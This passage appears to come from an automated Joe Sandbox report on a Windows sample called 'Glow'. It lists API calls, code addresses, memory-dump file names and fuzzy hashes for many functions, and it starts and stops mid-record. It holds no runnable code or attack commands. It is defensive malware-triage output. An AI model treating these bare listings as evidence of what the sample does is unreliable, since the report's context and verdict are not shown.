                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                          • Opcode ID: 7eee21ef9929ba35902e5c98f34de4c9ed27c23f6a7dbb7ab972621ab3938a13
                                                                                                                                                                          • Instruction ID: acb36875ce5f1e9d1f97976ae7d0608df5fa68cae821644d106de2c206ed21cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eee21ef9929ba35902e5c98f34de4c9ed27c23f6a7dbb7ab972621ab3938a13
                                                                                                                                                                          • Instruction Fuzzy Hash: D8919E70E00619ABDF20CFA4D884FAFBBB8EF45314F10856AF505AB280D7749941CFA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004043C8
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 004044D7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 004044E7
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0040467C
                                                                                                                                                                            • Part of subcall function 003F169E: VariantInit.OLEAUT32(00000000), ref: 003F16DE
                                                                                                                                                                            • Part of subcall function 003F169E: VariantCopy.OLEAUT32(?,?), ref: 003F16E7
                                                                                                                                                                            • Part of subcall function 003F169E: VariantClear.OLEAUT32(?), ref: 003F16F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                          • Opcode ID: 0db37765dc9e2abaf7137417b3a19e05e3c5a2b1e4f121cbd1f4fe3020327071
                                                                                                                                                                          • Instruction ID: 2428ce4bd9fcedf43a0fa5d66c69e3b900d61eb1b1d8a0dbee53d8a4192e7d43
                                                                                                                                                                          • Opcode Fuzzy Hash: 0db37765dc9e2abaf7137417b3a19e05e3c5a2b1e4f121cbd1f4fe3020327071
                                                                                                                                                                          • Instruction Fuzzy Hash: A4917CB4A04301AFC704EF24C48096AB7E5FF89714F14896EF9899B391DB35ED06CB96
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?,?,003E0C4E), ref: 003E091B
                                                                                                                                                                            • Part of subcall function 003E08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0936
                                                                                                                                                                            • Part of subcall function 003E08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?,?), ref: 003E0944
                                                                                                                                                                            • Part of subcall function 003E08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003E0831,80070057,?), ref: 003E0954
                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004056AE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 004057B6
                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0040582C
                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00405837
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                          • Opcode ID: ac9adc6b0c469da0c216cb0d68617f362948b06b67c248aeed3ed7337f101322
                                                                                                                                                                          • Instruction ID: 7c191713616499a82ffc7b75b3ceb3a860e2f1573f223f6cf822e10e2cebf3fe
                                                                                                                                                                          • Opcode Fuzzy Hash: ac9adc6b0c469da0c216cb0d68617f362948b06b67c248aeed3ed7337f101322
                                                                                                                                                                          • Instruction Fuzzy Hash: DE910771D00219EFDF11EFA4D880AEEB7B9EF08304F10856AE915BB291DB749A45CF64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenu.USER32(?), ref: 00412C1F
                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00412C51
                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00412C79
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00412CAF
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00412CE9
                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00412CF7
                                                                                                                                                                            • Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
                                                                                                                                                                            • Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
                                                                                                                                                                            • Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00412D7F
                                                                                                                                                                            • Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                          • Opcode ID: 2fb0c54663635658623487d50a4f4b4d8626fd5e8fa514f538b390d6254cc7fa
                                                                                                                                                                          • Instruction ID: 83d32dd9498ad0f2619df9d82114f5369bf1163c130544d6151ec319f0596de9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fb0c54663635658623487d50a4f4b4d8626fd5e8fa514f538b390d6254cc7fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 9671AE75E00215AFCB01EF64D941AEEB7F1EF48310F10846AE916EB351DB78EE818B94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(?), ref: 003EB8C0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 003EB8D5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 003EB936
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 003EB964
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 003EB983
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 003EB9C4
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003EB9E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: b14facfa514069288722cd62d5afdba0424ded517998dda06ef52ecb7da12a4b
                                                                                                                                                                          • Instruction ID: feec8845e99b5aa5a967f1f92814d67bc255b62302e5c4810bd3667780cb3a0a
                                                                                                                                                                          • Opcode Fuzzy Hash: b14facfa514069288722cd62d5afdba0424ded517998dda06ef52ecb7da12a4b
                                                                                                                                                                          • Instruction Fuzzy Hash: D651D1A09087E53EFB3742368855BBBFEA95B06304F098699F1D5568D3C3E8ACC4D750
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(00000000), ref: 003EB6E0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 003EB6F5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 003EB756
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003EB782
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003EB79F
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003EB7DE
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003EB7FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: 6403f389fbc17fc97a629ea7384f3ef0860e2d12b7305afc80d54d0073548522
                                                                                                                                                                          • Instruction ID: 29bde3ff9357abd52eb8921a7c22ed623afb855560cce14dbbd2a014056fe7a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6403f389fbc17fc97a629ea7384f3ef0860e2d12b7305afc80d54d0073548522
                                                                                                                                                                          • Instruction Fuzzy Hash: 555102A09087F53EFB3783268C15BB7FEA85F46304F098689E0D85A8D2D394EC94D750
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,003B5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 003B57E3
                                                                                                                                                                          • __fassign.LIBCMT ref: 003B585E
                                                                                                                                                                          • __fassign.LIBCMT ref: 003B5879
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 003B589F
                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,003B5F16,00000000,?,?,?,?,?,?,?,?,?,003B5F16,?), ref: 003B58BE
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,003B5F16,00000000,?,?,?,?,?,?,?,?,?,003B5F16,?), ref: 003B58F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 31b37c0b2b9296ac20773633490508f6c3839520f85cb34fe1686cd9381ebf40
                                                                                                                                                                          • Instruction ID: ad814b569fcac200bfa5771c423c39ed4603d77cb8680d773bc29f0724c4e7d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 31b37c0b2b9296ac20773633490508f6c3839520f85cb34fe1686cd9381ebf40
                                                                                                                                                                          • Instruction Fuzzy Hash: 0951C371A00649DFCB11CFA8D881BEEBBF8EF09315F14412AEA55E7291D730DA41CB65
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 003A30BB
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 003A30C3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 003A3151
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 003A317C
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 003A31D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: b2c19b8642de096fae999495285c8a2ec8cc1c77de5d007d5af790165d70372b
                                                                                                                                                                          • Instruction ID: e2253320069a92bd91ae7720cfbe0122a333219ea9dd5cc691aeb6837af64142
                                                                                                                                                                          • Opcode Fuzzy Hash: b2c19b8642de096fae999495285c8a2ec8cc1c77de5d007d5af790165d70372b
                                                                                                                                                                          • Instruction Fuzzy Hash: 05419234E00218ABCF12EF68CC85A9EBBB5EF46324F148165F815AB392D735DB05CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
                                                                                                                                                                            • Part of subcall function 00403AAB: _wcslen.LIBCMT ref: 00403AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00401B6F
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00401B7E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00401C26
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00401C56
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                          • Opcode ID: 0d30c5987d0c5dbd1078fc7ba206c33dda29dcf5831344d8fb767dca27082e09
                                                                                                                                                                          • Instruction ID: 8a0f800dc32fe7a4976ce59f84a8c610e0b0f5900916d708864bc7a7b021b9c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d30c5987d0c5dbd1078fc7ba206c33dda29dcf5831344d8fb767dca27082e09
                                                                                                                                                                          • Instruction Fuzzy Hash: 4541D771600214AFDB10AF64C844BAAB7E9EF45314F14806AF815AB2D2D778ED41CBE5
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ED7CD,?), ref: 003EE714
                                                                                                                                                                            • Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ED7CD,?), ref: 003EE72D
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003ED7F0
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 003ED82A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003ED8B0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003ED8C6
                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 003ED90C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                          • Opcode ID: 3ddd4661a4f1904b808ed933816ac4cbe9e55c3a4ebfd74147aff6b65de8603c
                                                                                                                                                                          • Instruction ID: 33f3a4308283bb8670a79ac0d54689efd6f35aa6ff0b42ffc60faf6408c94d05
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ddd4661a4f1904b808ed933816ac4cbe9e55c3a4ebfd74147aff6b65de8603c
                                                                                                                                                                          • Instruction Fuzzy Hash: 44416771D052689EDF13EFA5C985BDE77B8AF08340F1105EAA509EF181EB35A788CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetInputState.USER32 ref: 003F4310
                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003F4367
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 003F4390
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 003F439A
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F43AB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 2256411358-3218771753
                                                                                                                                                                          • Opcode ID: 74f4af3d2e445156026e493e0ac152a94c040e1b759074a43d7be58dd030d3d1
                                                                                                                                                                          • Instruction ID: 8a419f1887f97972125dd49e2cfd4a2ccb89ff67b46212613cdc05069cd75b91
                                                                                                                                                                          • Opcode Fuzzy Hash: 74f4af3d2e445156026e493e0ac152a94c040e1b759074a43d7be58dd030d3d1
                                                                                                                                                                          • Instruction Fuzzy Hash: E3311874A0434AEFEB36CB34D948BB73BA8AB01305F05453BD662C21A1E3B4E555CF25
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004138B8
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004138EB
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00413920
                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00413952
                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0041397C
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0041398D
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004139A7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                          • Opcode ID: ead4df335917e5cd61e269d18b8269eea8af361da31d218f05cb2ebd691a9657
                                                                                                                                                                          • Instruction ID: 72ffc98168aa7f4206393f58fec15ee04d1f49e061a01c9468f40c8f57bfd02a
                                                                                                                                                                          • Opcode Fuzzy Hash: ead4df335917e5cd61e269d18b8269eea8af361da31d218f05cb2ebd691a9657
                                                                                                                                                                          • Instruction Fuzzy Hash: 203157B0704251AFDB21CF58DC84FA537E4FB86712F1401A6F5148B3B2CBB8A985CB49
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E80D0
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E80F6
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 003E80F9
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 003E8117
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 003E8120
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003E8145
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 003E8153
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: 19e0291393c9394d816e7b259b96f1cc42dadb95c2c04f8fbab5d8ef6021125a
                                                                                                                                                                          • Instruction ID: fde9f31680a5d7aba53cc73ff60e5a46cfb1b9fa762ea73a841708be86de13a6
